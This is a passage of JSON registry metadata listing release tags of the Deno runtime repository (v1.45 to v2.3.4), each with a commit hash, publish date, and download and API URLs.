ories/denoland%2Fdeno/tags/v2.3.4/manifests"},{"name":"v2.3.3","sha":"395878c5fb72d87a44f7c88ce9f391acc31feab3","kind":"commit","published_at":"2025-05-16T11:37:53.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.3.3","html_url":"https://github.com/denoland/deno/releases/tag/v2.3.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.3.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.3.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.3.3/manifests"},{"name":"v2.3.2","sha":"7b74f385396bded16f99db64b97aa48e6f603f16","kind":"commit","published_at":"2025-05-15T23:18:59.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.3.2","html_url":"https://github.com/denoland/deno/releases/tag/v2.3.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.3.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.3.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.3.2/manifests"},{"name":"v2.2.13","sha":"0117f27aef98e1bf9a8689fe5ab6b03b5a1453f7","kind":"commit","published_at":"2025-05-13T20:00:01.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.2.13","html_url":"https://github.com/denoland/deno/releases/tag/v2.2.13","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.2.13","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.13","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.13/manifests"},{"name":"v2.1.13","sha":"5b85bdaf88e36a1fcae3e442d96f026e4e1f9b92","kind":"commit","published_at":"2025-05-13T19:41:01.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.1.13","html_url":"https://github.com/denoland/deno/releases/tag/v2.1.13","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.1.13","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.13","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.13/manifests"},{"name":"v2.3.1","sha":"8773b5f5b074e1e374a403d05943b6a7bbbdebad","kind":"commit","published_at":"2025-04-30T10:48:46.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.3.1","html_url":"https://github.com/denoland/deno/releases/tag/v2.3.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.3.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.3.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.3.1/manifests"},{"name":"v2.3.0","sha":"61574bb9c9c255d5c661add6c7464af30475c197","kind":"commit","published_at":"2025-04-30T07:49:31.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.3.0","html_url":"https://github.com/denoland/deno/releases/tag/v2.3.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.3.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.3.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.3.0/manifests"},{"name":"v2.2.12","sha":"81da8139af85a0cb7efa9050ae6b5461b3614077","kind":"commit","published_at":"2025-04-24T20:37:22.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.2.12","html_url":"https://github.com/denoland/deno/releases/tag/v2.2.12","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.2.12","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.12","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.12/manifests"},{"name":"v2.2.11","sha":"225fbd59bf9a1d50603adb99fe2748edf70b9de2","kind":"commit","published_at":"2025-04-18T12:16:45.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.2.11","html_url":"https://github.com/denoland/deno/releases/tag/v2.2.11","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.2.11","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.11","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.11/manifests"},{"name":"v2.2.10","sha":"adc34a6b3b8f6ff593810c0655d0d1a4b7ea3729","kind":"commit","published_at":"2025-04-14T20:59:59.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.2.10","html_url":"https://github.com/denoland/deno/releases/tag/v2.2.10","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.2.10","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.10","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.10/manifests"},{"name":"v2.1.12","sha":"16b18e2b8dddde755364b740d63aa7da3646b33c","kind":"commit","published_at":"2025-04-11T23:06:05.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.1.12","html_url":"https://github.com/denoland/deno/releases/tag/v2.1.12","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.1.12","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.12","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.12/manifests"},{"name":"v2.2.9","sha":"25defa74d539d1d6fd27ddabd5260705677c43e8","kind":"commit","published_at":"2025-04-11T18:52:19.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.2.9","html_url":"https://github.com/denoland/deno/releases/tag/v2.2.9","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.2.9","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.9","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.9/manifests"},{"name":"v2.1.11","sha":"d73d467148cff810ccf9c96bed9bcaf32ce5281c","kind":"commit","published_at":"2025-04-08T23:54:13.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.1.11","html_url":"https://github.com/denoland/deno/releases/tag/v2.1.11","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.1.11","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.11","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.11/manifests"},{"name":"v2.2.8","sha":"32b9cc91d8c343bdec2ddcf3cedb27b5efc2f5e4","kind":"commit","published_at":"2025-04-05T01:17:29.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.2.8","html_url":"https://github.com/denoland/deno/releases/tag/v2.2.8","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.2.8","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.8","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.8/manifests"},{"name":"v2.2.7","sha":"e7dab411533fd7240fd794398ba9d9590e28f69d","kind":"commit","published_at":"2025-04-04T08:05:09.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.2.7","html_url":"https://github.com/denoland/deno/releases/tag/v2.2.7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.2.7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.7/manifests"},{"name":"v2.2.6","sha":"2037200c4bc903162cd16b71b2564ab5bcd0601e","kind":"commit","published_at":"2025-03-28T05:25:19.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.2.6","html_url":"https://github.com/denoland/deno/releases/tag/v2.2.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.2.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.6/manifests"},{"name":"v2.2.5","sha":"6e08a9d2291cf45ae4031e163b8c1a03a0e85983","kind":"commit","published_at":"2025-03-21T05:07:53.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.2.5","html_url":"https://github.com/denoland/deno/releases/tag/v2.2.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.2.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.5/manifests"},{"name":"v2.2.4","sha":"33132abbd9ee0defa4bf0332c4797ee4341a03fc","kind":"commit","published_at":"2025-03-14T19:06:09.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.2.4","html_url":"https://github.com/denoland/deno/releases/tag/v2.2.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.2.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.4/manifests"},{"name":"v2.2.3","sha":"8203278401f4ffcb477a28b3ae9b915d88de7dd7","kind":"commit","published_at":"2025-03-05T04:00:03.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.2.3","html_url":"https://github.com/denoland/deno/releases/tag/v2.2.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.2.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.3/manifests"},{"name":"v2.2.2","sha":"b2e5efd3826974857f4e5a94d87c2c724fa5bf5d","kind":"commit","published_at":"2025-02-25T07:17:58.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.2.2","html_url":"https://github.com/denoland/deno/releases/tag/v2.2.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.2.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.2/manifests"},{"name":"v2.2.1","sha":"6057bc30da1df2b247f584b5280e1f10c02eec75","kind":"commit","published_at":"2025-02-20T23:41:27.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.2.1","html_url":"https://github.com/denoland/deno/releases/tag/v2.2.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.2.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.1/manifests"},{"name":"v2.2.0","sha":"29688168631edb677a444ba3cd02b2be21304a1f","kind":"commit","published_at":"2025-02-18T23:12:17.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.2.0","html_url":"https://github.com/denoland/deno/releases/tag/v2.2.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.2.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.0/manifests"},{"name":"v2.1.10","sha":"073e0879791486f70c7ac99d2d100c3fca6ac461","kind":"commit","published_at":"2025-02-13T06:33:17.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.1.10","html_url":"https://github.com/denoland/deno/releases/tag/v2.1.10","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.1.10","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.10","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.10/manifests"},{"name":"v2.1.9","sha":"46e2f9a47ee5293547efd089438db29690a05f85","kind":"commit","published_at":"2025-01-31T00:21:43.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.1.9","html_url":"https://github.com/denoland/deno/releases/tag/v2.1.9","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.1.9","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.9","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.9/manifests"},{"name":"v2.1.8","sha":"318646f7678111d24b139f4c589a4ef447c8cf1c","kind":"commit","published_at":"2025-01-30T18:19:27.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.1.8","html_url":"https://github.com/denoland/deno/releases/tag/v2.1.8","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.1.8","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.8","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.8/manifests"},{"name":"v2.1.7","sha":"379079d9049499af660b70423aa7cc3aca0d5e52","kind":"commit","published_at":"2025-01-22T00:51:38.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.1.7","html_url":"https://github.com/denoland/deno/releases/tag/v2.1.7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.1.7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.7/manifests"},{"name":"v2.1.6","sha":"4ee86d8d125c7b36570e87f0725eb82b6fe4a4b4","kind":"commit","published_at":"2025-01-16T23:35:01.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.1.6","html_url":"https://github.com/denoland/deno/releases/tag/v2.1.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.1.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.6/manifests"},{"name":"v2.1.5","sha":"d15a95e28b0ec015c2f2a88cca3882ba96d5da98","kind":"commit","published_at":"2025-01-09T20:55:14.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.1.5","html_url":"https://github.com/denoland/deno/releases/tag/v2.1.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.1.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.5/manifests"},{"name":"v2.1.4","sha":"b32ed7516cfdaaff76203ca530796d6a1235568d","kind":"commit","published_at":"2024-12-11T03:31:27.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.1.4","html_url":"https://github.com/denoland/deno/releases/tag/v2.1.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.1.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.4/manifests"},{"name":"v2.1.3","sha":"7f9b1ff30f7d9880b7c825c2b5f2de3137343d76","kind":"commit","published_at":"2024-12-05T23:36:23.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.1.3","html_url":"https://github.com/denoland/deno/releases/tag/v2.1.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.1.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.3/manifests"},{"name":"v2.1.2","sha":"2039abe8d2bc82fa800f4118707a48ac6f5e02ae","kind":"commit","published_at":"2024-11-28T15:45:48.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.1.2","html_url":"https://github.com/denoland/deno/releases/tag/v2.1.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.1.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.2/manifests"},{"name":"v2.1.1","sha":"5d71b461530f7c374c08701cef5678a5a4ac5484","kind":"commit","published_at":"2024-11-21T17:28:20.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.1.1","html_url":"https://github.com/denoland/deno/releases/tag/v2.1.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.1.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.1/manifests"},{"name":"v2.1.0","sha":"3da4eca7c1ed97906654671669e0bb3b095bc637","kind":"commit","published_at":"2024-11-21T02:05:02.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.1.0","html_url":"https://github.com/denoland/deno/releases/tag/v2.1.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.1.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.0/manifests"},{"name":"v2.0.6","sha":"8f59d18202e94e5c54ad7e5a79ec1383159e4a20","kind":"commit","published_at":"2024-11-10T04:38:11.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.0.6","html_url":"https://github.com/denoland/deno/releases/tag/v2.0.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.0.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.0.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.0.6/manifests"},{"name":"v2.0.5","sha":"78a799b4947461eb5c6092295cbcdabfe94053f7","kind":"commit","published_at":"2024-11-06T00:19:05.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.0.5","html_url":"https://github.com/denoland/deno/releases/tag/v2.0.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.0.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.0.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.0.5/manifests"},{"name":"v2.0.4","sha":"b7c282d2f80b12b0b2a435780fb0ea2b236ab224","kind":"commit","published_at":"2024-10-30T00:15:35.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.0.4","html_url":"https://github.com/denoland/deno/releases/tag/v2.0.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.0.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.0.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.0.4/manifests"},{"name":"v2.0.3","sha":"997bd47fc27ad920f3388c94a95829ff45394c84","kind":"commit","published_at":"2024-10-25T00:57:52.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.0.3","html_url":"https://github.com/denoland/deno/releases/tag/v2.0.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.0.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.0.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.0.3/manifests"},{"name":"v2.0.2","sha":"22a79ea420e67e783d996d5d1d64983192cb3dd8","kind":"commit","published_at":"2024-10-17T23:28:36.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.0.2","html_url":"https://github.com/denoland/deno/releases/tag/v2.0.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.0.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.0.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.0.2/manifests"},{"name":"v2.0.1","sha":"99c2aa573057e337f3474d43a7aab8c5e6b4caa2","kind":"commit","published_at":"2024-10-16T22:42:35.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.0.1","html_url":"https://github.com/denoland/deno/releases/tag/v2.0.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.0.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.0.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.0.1/manifests"},{"name":"v2.0.0","sha":"a62c7e036ab6851c0293f407ead635a7331445b7","kind":"commit","published_at":"2024-10-08T14:37:28.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.0.0","html_url":"https://github.com/denoland/deno/releases/tag/v2.0.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.0.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.0.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.0.0/manifests"},{"name":"v1.46.3","sha":"a98e146a55b209458160bcd148497310a9e14441","kind":"commit","published_at":"2024-09-04T12:12:16.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.46.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.46.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.46.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.46.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.46.3/manifests"},{"name":"v1.46.2","sha":"1b62d42631013724432f1ba4a3b04f506450abba","kind":"commit","published_at":"2024-08-29T16:07:49.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.46.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.46.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.46.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.46.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.46.2/manifests"},{"name":"v1.46.1","sha":"de11ff8c556c6922f832f639f54e5f7a6a3096b9","kind":"commit","published_at":"2024-08-22T14:18:55.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.46.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.46.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.46.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.46.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.46.1/manifests"},{"name":"v1.46.0","sha":"3314a0ceb8f874986d5da9f36f683740bd813750","kind":"commit","published_at":"2024-08-22T00:16:45.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.46.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.46.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.46.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.46.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.46.0/manifests"},{"name":"v1.45.5","sha":"52fd273834c0675f651577e23785d76f67423ab1","kind":"commit","published_at":"2024-07-31T19:11:09.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.45.5","html_url":"https://github.com/denoland/deno/releases/tag/v1.45.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.45.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.45.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.45.5/manifests"},{"name":"v1.45.4","sha":"c0b1d19d559bfb1fbb65675b3849a9c0396d131f","kind":"commit","published_at":"2024-07-26T16:38:02.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.45.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.45.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.45.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.45.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.45.4/manifests"},{"name":"v1.45.3","sha":"87ce64e57486fc006e82806c9ed8c49f11c2cb73","kind":"commit","published_at":"2024-07-22T21:34:15.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.45.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.45.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.45.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.45.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.45.3/manifests"},{"name":"v1.45.2","sha":"85de4280a1f9fae572a7331db6344cee123ddab7","kind":"commit","published_at":"2024-07-12T20:04:46.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.45.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.45.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.45.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.45.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.45.2/manifests"},{"name":"v1.45.1","sha":"c841d163e3dc344c06f10579672cc5e2b095933f","kind":"commit","published_at":"2024-07-11T18:46:42.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.45.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.45.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.45.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.45.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.45.1/manifests"},{"name":"v1.45.0","sha":"04ff5c731d55f2402e7b08e378eaf6e5a